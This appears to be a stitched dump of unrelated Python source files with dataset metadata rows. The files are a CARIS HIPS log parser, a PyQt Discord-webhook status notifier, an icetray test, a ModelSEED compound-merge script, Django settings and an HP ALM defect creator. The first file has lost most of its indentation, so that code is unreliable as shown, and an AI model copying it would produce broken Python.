"""A CARIS port under Process Model 1.0"""
def __init__(self):
"""Initialize with empty name and sources list"""
self.name = ''
self.sources = []
def set_sources(self, sources):
"""Set the sources list"""
if sources:
self.sources = sources
def get_sources(self):
"""Get the sources list"""
return self.sources
def get_source(self, index):
"""Get a source by index"""
return self.sources[index]
class CARISProcess(CARISObject):
""" A CARIS Process under Process Model 1.0"""
def __init__(self):
"""Initialize with empty name, version, ports dictionary, and log list"""
self.name = ''
self.version = ''
self.ports = {}
self.log = []
def set_version(self, version):
"""Set the version"""
if version:
self.version = version
def set_ports(self, ports):
"""Set the ports dictionary"""
if ports:
self.ports = ports
def add_port(self, name, port):
"""Add a port to the dictionary"""
if port:
self.ports[name] = port
def set_log(self, log):
"""Set the log list"""
if log:
self.log = log
def get_version(self):
"""Return the version"""
return self.version
def get_ports(self):
"""Return the ports dictionary"""
return self.ports
def get_port(self, name):
"""Return a port value by key"""
return self.ports[name]
def get_log(self):
"""Return the log list"""
return self.log
class HIPSLog:
"""
A class representing a HIPS line log.
Applicable only for logs created in HIPS v10.0.0 and above (Process.log)
"""
    def __init__(self, log_path=None):
        """Initialize with empty source path, process list and version.
        If an existing log path is provided, all of its entries are parsed into this object."""
        self.source_path = ''
        self.processes = []
        self.version = ''
        if log_path:
            self.source_path = log_path
            tree = ElementTree.parse(log_path)
            root = tree.getroot()
            self.version = root.find('version').text
            for process in root.findall('process'):
                proc_obj = self.__parse_process(process)
                self.processes.append(proc_obj)
def set_source_path(self, path):
"""Set the source path"""
if path:
self.source_path = path
def set_version(self, version):
"""Set the version"""
if version:
self.version = version
def set_processes(self, process):
"""Set the processes list"""
if process:
self.processes = process
def get_source_path(self):
"""Return the source path"""
return self.source_path
def get_version(self):
"""Return the version"""
return self.version
def get_processes(self):
"""Return the list of processes"""
return self.processes
def get_process(self, index):
"""Return a specific process object by index"""
return self.processes[index]
def get_last_process(self, process_name):
"""Returns the last log entry of the provided name."""
return self.get_process(next(i for i, v in zip(list(range(len(
self.processes) - 1, -1, -1)), reversed(self.processes)) if v.get_name() == process_name))
def has_process(self, process_name):
"""Check if the process exists in the log"""
return any(process_name in s.get_name() for s in self.processes)
def __parse_process(self, process):
"""Internal process to parse the process XML"""
proc_obj = CARISProcess()
# set metadata
proc_obj.set_name(process.find('id').text)
proc_obj.set_version(process.find('version').text)
log = process.find('log')
log_obj = CARISLog()
log_obj.set_user(log.find('user').text)
log_obj.set_start_time(log.find('start').text)
log_obj.set_end_time(log.find('end').text)
soft = log.find('software')
log_obj.set_software(
soft.find('id').text +
' ' +
soft.find('version').text)
proc_obj.set_log(log_obj)
# add ports
for option in process.findall('port'):
opt_obj = self.__parse_port(option)
proc_obj.add_port(opt_obj.get_name(), opt_obj)
return proc_obj
def __parse_port(self, option):
"""Internal process to parse each port (option) of the log entry"""
opt_obj = CARISPort()
opt_obj.set_name(option.find('id').text)
for source in option.findall('source'):
src_obj = self.__parse_source(source)
opt_obj.sources.append(src_obj)
return opt_obj
def __parse_source(self, source):
"""Internal process to parse each source of a given port"""
src_obj = CARISSource()
data = source.find('data')
simple = data.find('simple')
if simple:
src_obj.set_name('simple')
src_obj.set_type(simple.find('type').text)
src_obj.set_data(simple.find('value').text)
else:
complex_v = data.find('complex')
if complex_v:
src_obj.set_name('complex')
src_obj.set_type('complex')
# simply store this part of the ETree
src_obj.set_data(complex_v)
return src_obj
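# --- Illustrative usage sketch --------------------------------------------------
# HIPSLog parses a Process.log written by HIPS v10.0.0 and above (see the class
# docstring). The path and the process name below are placeholder assumptions,
# and the sketch only runs when this module is executed directly.
if __name__ == "__main__":
    example_log_path = r"C:\HIPSData\Project\Vessel\2020-123\Line001\Process.log"  # hypothetical path
    if os.path.exists(example_log_path):
        hips_log = HIPSLog(example_log_path)
        print('Log version: {}'.format(hips_log.get_version()))
        for proc in hips_log.get_processes():
            print('{} started {}'.format(proc.get_name(), proc.get_log().get_start_time()))
        if hips_log.has_process('SoundVelocityCorrection'):  # assumed process id
            last_run = hips_log.get_last_process('SoundVelocityCorrection')
            print('Last run by {}'.format(last_run.get_log().get_user()))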
| 27.865248 | 102 | 0.573556 | 977 | 7,858 | 4.452405 | 0.128966 | 0.024828 | 0.038851 | 0.028966 | 0.135172 | 0.123218 | 0.116322 | 0.108506 | 0.108506 | 0.108506 | 0 | 0.00277 | 0.310893 | 7,858 | 281 | 103 | 27.964413 | 0.800554 | 0.213286 | 0 | 0.155689 | 0 | 0 | 0.019293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.269461 | false | 0 | 0.011976 | 0 | 0.449102 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10d567f52597f63ae873c81fa0c69444cf588834 | 6,863 | py | Python | uiConfig.py | g-ulrich/ScreenShotToDiscord | 7228d01637d426a2767a9531576880180a49c92f | [
"MIT"
] | null | null | null | uiConfig.py | g-ulrich/ScreenShotToDiscord | 7228d01637d426a2767a9531576880180a49c92f | [
"MIT"
] | null | null | null | uiConfig.py | g-ulrich/ScreenShotToDiscord | 7228d01637d426a2767a9531576880180a49c92f | [
"MIT"
] | null | null | null | from PyQt5.QtCore import QTimer, QTime
from PyQt5 import QtGui, QtWidgets
import time
import random
import os
import datetime
import requests
import sqlite3 as sql
import database_impl as db
from date_tools import dt
def datetime_diff(old_datetime, new_datetime, dates_are_strings=True):
"""
String dates should be in this format "%Y-%m-%d %H:%M:%S"
"""
seconds_in_day = 24 * 60 * 60
if dates_are_strings:
d1 = datetime.datetime.strptime(old_datetime, "%Y-%m-%d %H:%M:%S")
d2 = datetime.datetime.strptime(new_datetime, "%Y-%m-%d %H:%M:%S")
else:
d1, d2 = old_datetime, new_datetime
difference = d1 - d2
x = divmod(difference.days * seconds_in_day + difference.seconds, 60)
minutes, seconds = x[0], x[1]
return minutes, seconds
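# Illustrative usage, assuming the "%Y-%m-%d %H:%M:%S" format described above:
#   datetime_diff("2020-01-01 10:05:30", "2020-01-01 10:00:00") -> (5, 30)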
def current_time():
t = QTime.currentTime().toString()
    am_pm = "pm" if 12 <= int(t[:2]) <= 23 else "am"
return t + " " + am_pm
def message_discord_server(message, user_data={}):
try:
discord_webhook_url = user_data['discordwebhook']
Message = {
"content": str(message)
}
requests.post(discord_webhook_url, data=Message)
except Exception as e:
print("ERROR discord", e)
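# Illustrative call (the webhook URL shape is an assumption, not a real endpoint):
#   message_discord_server("bot online",
#       user_data={'discordwebhook': 'https://discord.com/api/webhooks/<id>/<token>'})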
class Presets:
def event_log(self, message):
t, c = current_time(), self.ui.mouseList.count()
self.ui.mouseList.setCurrentRow(c-1)
self.ui.mouseLastUpdate.setText(' {}'.format(t))
if c > 100:
self.ui.mouseList.clear()
self.ui.mouseList.addItem("CLEARED --> {}".format(t))
self.ui.mouseList.takeItem(c-1)
self.ui.mouseList.addItem("[{}] {}".format(t, message))
self.ui.mouseList.addItem("")
def init_ui(self):
self.ui.password.setEchoMode(QtWidgets.QLineEdit.Password)
self.ui.bar.setMaximum(100)
self.ui.bar.setValue(100)
self.setWindowIcon(QtGui.QIcon('images/discord.png'))
# Presets.mouse_loop(self)
self.ui.close.clicked.connect(lambda: self.close())
self.ui.minimize.clicked.connect(lambda: self.showMinimized())
self.ui.startBtn.clicked.connect(lambda: Presets.start(self))
self.ui.stopBtn.clicked.connect(lambda: Presets.stop(self))
self.ui.password.returnPressed.connect(lambda: Presets.start(self))
self.ui.stopBtn.hide()
def progress_bar_count(self):
self.ui.SECONDS -= 1
self.ui.bar.setValue(self.ui.SECONDS)
def start(self):
CON = sql.connect('userData/user.db')
if db.valid_login_password(CON, self.ui.password.text(), commit=False) and not db.select_stop_session_status(CON, commit=False):
self.ui.user_data = db.user_data_by_password(CON, self.ui.password.text(), commit=False)
if self.ui.mins.value() != 0.0 or self.ui.hrs.value() != 0.0:
self.ui.start_timer = QTimer()
self.ui.start_timer.timeout.connect(lambda: Presets.awake_loop(self))
hrs_to_secs, mins_to_secs = (self.ui.hrs.value() * 60) * 60000, self.ui.mins.value() * 60000
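                # NOTE: despite the "_secs" names these values are milliseconds
                # (QTimer.start() takes ms); self.ui.SECONDS divides back to seconds.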
self.ui.start_timer.start(hrs_to_secs + mins_to_secs)
self.ui.SECONDS = (hrs_to_secs + mins_to_secs) / 1000
Presets.event_log(self, "Start")
Presets.event_log(self, "Interval set to {} minute(s).".format(self.ui.SECONDS / 60))
self.ui.bar.setMaximum(self.ui.SECONDS)
self.ui.bar.setValue(self.ui.SECONDS)
self.ui.progress_timer = QTimer()
self.ui.progress_timer.timeout.connect(lambda: Presets.progress_bar_count(self))
self.ui.progress_timer.start(1000)
self.ui.stopBtn.show()
self.ui.startBtn.hide()
else:
Presets.event_log(self, "Set an interval! :)")
else:
if not db.valid_login_password(CON, self.ui.password.text(), commit=False):
Presets.event_log(self, "Enter an application password. :)")
if db.select_stop_session_status(CON, commit=False):
Presets.event_log(self, "Start live trading session. :)")
def stop(self):
self.ui.start_timer.stop()
self.ui.progress_timer.stop()
self.ui.bar.setMaximum(100)
self.ui.bar.setValue(100)
Presets.event_log(self, "Stop")
self.ui.stopBtn.hide()
self.ui.startBtn.show()
def awake_loop(self):
CON = sql.connect('userData/user.db')
data = db.get_timestamps_from_livetrade(CON, commit=False)
# current set
current_min_diff, sec1 = datetime_diff(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), data[-1])
# last set
previous_min_diff, sec2 = datetime_diff(data[-1], data[-2])
#second to last set
min3, sec3 = datetime_diff(data[-2], data[-3])
        message = "_"
        # If the configured checkup interval exceeds the measured gap between
        # timestamps, the live-trade loop is still considered healthy.
checkup_interval = self.ui.mins.value() + (self.ui.hrs.value() * 60)
livetrade_loop_rate = min3 if previous_min_diff == min3 else "unknown"
if data[-1] != "2000-01-01 00:00:00":
if checkup_interval < current_min_diff:
message = "```diff\n-Error! Application stopped live trading!\n-Stoppage occurred after: {}\n``` ".format(data[-1])
elif current_min_diff > previous_min_diff:
message = "```ini\n[Warning! Application either slowed down or stopped live trading.]\n[Last loop occurrence: {}]\n``` ".format(data[-1])
else:
message = "```diff\n+Success! Application is live trading.\n+Last loop occurrence: {}\n+Live Trade Loop Rate: {} minute(s)``` ".format(data[-1], livetrade_loop_rate)
else:
lastItem = self.ui.mouseList.currentItem().text()
if "bypassing" not in lastItem or "_" not in lastItem:
db.drop_table(CON, "live_trade_timestamps", commit=True)
db.insert_timestamp_livetrade(CON, data=("2000-01-01 00:00:00", ""), commit=False)
db.insert_timestamp_livetrade(CON, data=("2000-01-01 00:00:00", ""), commit=False)
db.insert_timestamp_livetrade(CON, data=("2000-01-01 00:00:00", ""), commit=True)
message = "Market Closed: bypassing checkup..."
Presets.event_log(self, message)
if message != "":
message_discord_server(message, self.ui.user_data)
Presets.event_log(self, "\n"+message.replace("```", "").replace("diff", "").replace("ini", ""))
hrs_to_secs, mins_to_secs = (self.ui.hrs.value() * 60) * 60000, self.ui.mins.value() * 60000
self.ui.SECONDS = (hrs_to_secs + mins_to_secs)/1000
self.ui.bar.setMaximum(self.ui.SECONDS)
self.ui.bar.setValue(self.ui.SECONDS)
| 43.713376 | 181 | 0.616203 | 911 | 6,863 | 4.503842 | 0.230516 | 0.086278 | 0.026322 | 0.037046 | 0.32001 | 0.291981 | 0.263709 | 0.219352 | 0.165489 | 0.165489 | 0 | 0.030233 | 0.243334 | 6,863 | 156 | 182 | 43.99359 | 0.759869 | 0.017776 | 0 | 0.192 | 0 | 0.024 | 0.115344 | 0.003162 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072 | false | 0.064 | 0.08 | 0 | 0.176 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
10db0a1461dd4901dea43c8088f2d331ca5bbb5e | 908 | py | Python | icetray/resources/test/shoulddo.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | [
"MIT"
] | 1 | 2020-12-24T22:00:01.000Z | 2020-12-24T22:00:01.000Z | icetray/resources/test/shoulddo.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | [
"MIT"
] | null | null | null | icetray/resources/test/shoulddo.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | [
"MIT"
] | 3 | 2020-07-17T09:20:29.000Z | 2021-03-30T16:44:18.000Z | #!/usr/bin/env python
#
# Sample i3module in python
#
from icecube.icetray import *
from I3Tray import *
tray = I3Tray()
# generate empty frames
tray.AddModule("BottomlessSource","bottomless")
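# Factory returning a module class (derived from the given base) that counts
# ShouldDoPhysics calls and asserts exactly one occurs before each Physics call.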
def make_counter(base):
class ShouldCounter(base):
def __init__(self, context):
base.__init__(self, context)
self.sdp = 0
def ShouldDoPhysics(self, frame):
print(base.__name__ + " *** ShouldDoPhysics")
self.sdp += 1
return True
def Physics(self, frame):
print("%s *** sdp == %d" % (base.__name__, self.sdp))
assert self.sdp == 1
self.sdp = 0
self.PushFrame(frame)
return ShouldCounter
tray.AddModule(make_counter(I3Module), "modulecounter")
tray.AddModule(make_counter(I3ConditionalModule), "conditionalmodulecounter")
# do it 5 times.
tray.Execute(5)
| 23.282051 | 77 | 0.615639 | 98 | 908 | 5.510204 | 0.510204 | 0.064815 | 0.055556 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016566 | 0.268722 | 908 | 38 | 78 | 23.894737 | 0.796687 | 0.092511 | 0 | 0.090909 | 1 | 0 | 0.121175 | 0.029376 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.409091 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10db498d974995cdddc73b0eb663f988c2c1a75e | 3,405 | py | Python | Scripts/Biochemistry/Merge_Compounds.py | nkkchem/ModelSEEDDatabase | a117e433f540e931ee60a961f0d23cfc23cc387d | [
"MIT"
] | null | null | null | Scripts/Biochemistry/Merge_Compounds.py | nkkchem/ModelSEEDDatabase | a117e433f540e931ee60a961f0d23cfc23cc387d | [
"MIT"
] | null | null | null | Scripts/Biochemistry/Merge_Compounds.py | nkkchem/ModelSEEDDatabase | a117e433f540e931ee60a961f0d23cfc23cc387d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os, sys
temp=list();
header=1;
sys.path.append('../../Libs/Python')
from BiochemPy import Reactions, Compounds
ReactionsHelper = Reactions()
Reactions_Dict = ReactionsHelper.loadReactions()
CompoundsHelper = Compounds()
Compounds_Dict = CompoundsHelper.loadCompounds()
Compound_To_Merge_From="cpd00013"
Compound_To_Merge_To="cpd19013"
Cpds_Rxns_Dict=dict()
Rxns_Cpds_Dict=dict()
for rxn in Reactions_Dict.keys():
if(Reactions_Dict[rxn]["status"] == "EMPTY"):
continue
for rgt in Reactions_Dict[rxn]["stoichiometry"].split(";"):
(coeff,cpd,cpt,index,name) = rgt.split(":",4)
if(cpd not in Cpds_Rxns_Dict):
Cpds_Rxns_Dict[cpd]=dict()
Cpds_Rxns_Dict[cpd][rxn]=1
if(rxn not in Rxns_Cpds_Dict):
Rxns_Cpds_Dict[rxn]=dict()
Rxns_Cpds_Dict[rxn][cpd]=1
#Merging two compounds means:
#1) You take all the reactions for the second compound, and replace the compound id in the second reaction with the first compound
#Change stoichiometry only, first
#2) You check to see if all the reactions are balanced following the change
#3) You need to check to see if new reactions are now merged/linked to other reactions in database
#If truly still new reaction, change definition, code, compound_ids, equation
#If merged, change to obsolete and store linked reaction(s)
#4) You need to update Aliases
#5) You need to update media
#6) You need to report possible updates in templates (and, following modifications, re-build any public models?)
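# NOTE: only step 1 is sketched in the loop below; the unconditional sys.exit()
# after that loop stops the script before the balance-checking pass further down.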
for rxn in Cpds_Rxns_Dict[Compound_To_Merge_From].keys():
old_stoichiometry = Reactions_Dict[rxn]["stoichiometry"]
new_stoichiometry_array = list()
for rgt in old_stoichiometry.split(";"):
(coeff,cpd,cpt,index,name) = rgt.split(":",4)
#Replace cpd
if(cpd == Compound_To_Merge_From):
cpd = Compound_To_Merge_To
new_stoichiometry_array.append(":".join([coeff,cpd,cpt,index,name]))
new_stoichiometry = ";".join(new_stoichiometry_array)
if(new_stoichiometry == old_stoichiometry):
print rxn, old_stoichiometry, new_stoichiometry
break
sys.exit()
Update_Reactions=0
for rxn in sorted(Reactions_Dict.keys()):
if(Reactions_Dict[rxn]["status"] == "EMPTY"):
continue
Rxn_Cpds_Array=list()
for rgt in Reactions_Dict[rxn]["stoichiometry"].split(";"):
(coeff,cpd,cpt,index,name) = rgt.split(":",4)
rgt_id = cpd+"_"+cpt+index
Rxn_Cpds_Array.append({"reagent":rgt_id,"coefficient":coeff,
"formula":Compounds_Dict[cpd]["formula"],
"charge":Compounds_Dict[cpd]["charge"]})
Status = ReactionsHelper.balanceReaction(Rxn_Cpds_Array)
if("ERROR" in Status):
# print rxn,Status
continue
#Remove old HB message
old_status = ""
for item in Reactions_Dict[rxn]["status"].split("|"):
if(item != "HB"):
old_status += item+"|"
old_status = old_status[0:-1]
if(Status != old_status and ("OK" not in old_status and "OK" not in Status)):
print "Changing Status for "+rxn+" from "+Reactions_Dict[rxn]["status"]+" to "+Status
Reactions_Dict[rxn]["status"]=Status
Update_Reactions=1
#if(Update_Reactions==1):
# print "Saving reactions";
# ReactionsHelper.saveReactions(Reactions_Dict)
| 34.744898 | 130 | 0.676065 | 455 | 3,405 | 4.883516 | 0.272527 | 0.070207 | 0.057606 | 0.049505 | 0.205671 | 0.150765 | 0.133663 | 0.133663 | 0.133663 | 0.133663 | 0 | 0.009937 | 0.202056 | 3,405 | 97 | 131 | 35.103093 | 0.807876 | 0.246402 | 0 | 0.166667 | 0 | 0 | 0.081601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.033333 | null | null | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10dc80116f563ea0a2e9886f4435631d1b02b4b4 | 299 | py | Python | 021_loguru/multifile01.py | fkubota/rkkubotay-gmail.com | 03abffd520b6ba241d102184bba28507c8aa4d61 | [
"MIT"
] | null | null | null | 021_loguru/multifile01.py | fkubota/rkkubotay-gmail.com | 03abffd520b6ba241d102184bba28507c8aa4d61 | [
"MIT"
] | 49 | 2021-01-12T07:25:17.000Z | 2022-03-12T00:53:24.000Z | 021_loguru/multifile01.py | fkubota/rkkubotay-gmail.com | 03abffd520b6ba241d102184bba28507c8aa4d61 | [
"MIT"
] | null | null | null | from loguru import logger
from multifile02 import sum_ab
def run():
logger.add("log_multifile.log")
logger.info("="*30)
logger.info("start run")
sum_ab(5, 7)
logger.info("end run")
def main():
run()
logger.success('Complete.')
if __name__ == "__main__":
main()
| 14.95 | 35 | 0.625418 | 41 | 299 | 4.292683 | 0.560976 | 0.170455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.217391 | 299 | 19 | 36 | 15.736842 | 0.726496 | 0 | 0 | 0 | 0 | 0 | 0.170569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | true | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10dd33d3f2c88f6ed9447b48563fc0a3cb09360a | 4,903 | py | Python | reservas/settings/base.py | fedegallar/reservas | 75fc06b9dedf53eca76b61ea0ccc914d5e084b2d | [
"MIT"
] | 1 | 2018-11-10T14:57:54.000Z | 2018-11-10T14:57:54.000Z | reservas/settings/base.py | fedegallar/reservas | 75fc06b9dedf53eca76b61ea0ccc914d5e084b2d | [
"MIT"
] | 6 | 2020-06-05T17:11:56.000Z | 2021-09-07T23:38:00.000Z | reservas/settings/base.py | fedegallar/reservas | 75fc06b9dedf53eca76b61ea0ccc914d5e084b2d | [
"MIT"
] | 1 | 2019-04-16T20:00:05.000Z | 2019-04-16T20:00:05.000Z | # coding=utf-8
"""
Django settings for reservas project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import random
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Set the secret key from the 'DJANGO_SECRET_KEY' environment variable, or
# generate a random key if it is not set.
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY',
''.join([random.SystemRandom()
.choice('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)')
for i in range(50)]))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Project administrators.
ADMINS = []
MANAGERS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'djangobower',
'app_facturacion',
'app_reservas.apps.ReservasConfig',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'reservas.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'debug': DEBUG,
},
},
]
WSGI_APPLICATION = 'reservas.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Set the URL prefix for the Django project, according to the web server
# configuration.
DJANGO_URL_PREFIX = os.environ.get('DJANGO_URL_PREFIX', '')
# Format the URL prefix so that it has the form '<prefix>/'.
# 1. Strip leading and trailing slashes, in case the prefix has more than one.
DJANGO_URL_PREFIX = DJANGO_URL_PREFIX.strip('/')
# 2. Append a single trailing slash, as long as the prefix did not end up
#    empty after the previous step.
if DJANGO_URL_PREFIX:
DJANGO_URL_PREFIX += '/'
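# e.g. DJANGO_URL_PREFIX='/reservas/' becomes 'reservas/'; an unset value stays ''.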
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/' + DJANGO_URL_PREFIX + 'static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'djangobower.finders.BowerFinder',
)
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/' + DJANGO_URL_PREFIX + 'media/'
EVENTOS_URL = 'media/app_reservas/eventos_recursos/'
BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components')
BOWER_INSTALLED_APPS = (
'bootstrap-datepicker#1.6.0',
'bootswatch-dist#3.3.6-flatly',
'font-awesome#4.7.0',
'fullcalendar-scheduler',
'handsontable#0.31.2',
'jquery#1.9.1',
'pace#1.0.2',
'qtip2#2.2.1',
'slick-carousel#1.6.0'
)
# Google Calendar token, used to query event information from the
# Google Calendar calendars.
GOOGLE_CALENDAR_TOKEN = os.environ.get('GOOGLE_CALENDAR_TOKEN', '')
BROKER_URL = os.environ.get('BROKER_URL', 'amqp://guest:guest@rabbit//')
| 29.011834 | 98 | 0.698756 | 598 | 4,903 | 5.608696 | 0.423077 | 0.054264 | 0.035778 | 0.029219 | 0.140429 | 0.130292 | 0.081097 | 0.081097 | 0.023852 | 0 | 0 | 0.015764 | 0.171936 | 4,903 | 168 | 99 | 29.184524 | 0.810345 | 0.314705 | 0 | 0 | 1 | 0 | 0.467548 | 0.361178 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021505 | 0 | 0.021505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10df133a433492185e9da42e3e25c81ed4744f41 | 2,206 | py | Python | src/main/resources/alm/CreateDefect.py | xebialabs-community/xlr-hpalm-plugin | e374f9082595a34afe7bef8e644715b2b0462c33 | [
"MIT"
] | null | null | null | src/main/resources/alm/CreateDefect.py | xebialabs-community/xlr-hpalm-plugin | e374f9082595a34afe7bef8e644715b2b0462c33 | [
"MIT"
] | 1 | 2019-05-13T17:36:45.000Z | 2019-05-13T17:36:45.000Z | src/main/resources/alm/CreateDefect.py | xebialabs-community/xlr-hpalm-plugin | e374f9082595a34afe7bef8e644715b2b0462c33 | [
"MIT"
] | 3 | 2019-05-10T17:48:20.000Z | 2020-07-08T14:22:20.000Z | #
# Copyright 2021 XEBIALABS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from alm.almClientUtil import almClientUtil
from java.util import Calendar
import json
alm_client = almClientUtil.create_alm_client(server, username, password)
cookies = alm_client.login()
alm_client = almClientUtil.create_alm_client(server, cookies=cookies.get_dict())
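# Build the defect payload; the month in "creation-time" is shifted by one
# because java.util.Calendar months are zero-indexed.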
content = {
"data": [
{
"type": "defect",
"name": title,
"description": description,
"severity": severity,
"detected-by": detectedBy,
"creation-time": "%s-%s-%s"
% (
str(Calendar.getInstance().get(Calendar.YEAR)),
str(Calendar.getInstance().get(Calendar.MONTH) + 1), # zero indexed
str(Calendar.getInstance().get(Calendar.DAY_OF_MONTH)),
),
}
]
}
for additionalField in additionalFields.keys():
content["data"][0][additionalField] = additionalFields[additionalField]
result = alm_client.create_defect(domain, project, json.dumps(content))
defectId = result["data"][0]["id"]
output = json.dumps(result)
print "Successfully created a defect with id [ %s ]" % defectId
logout = alm_client.logout()
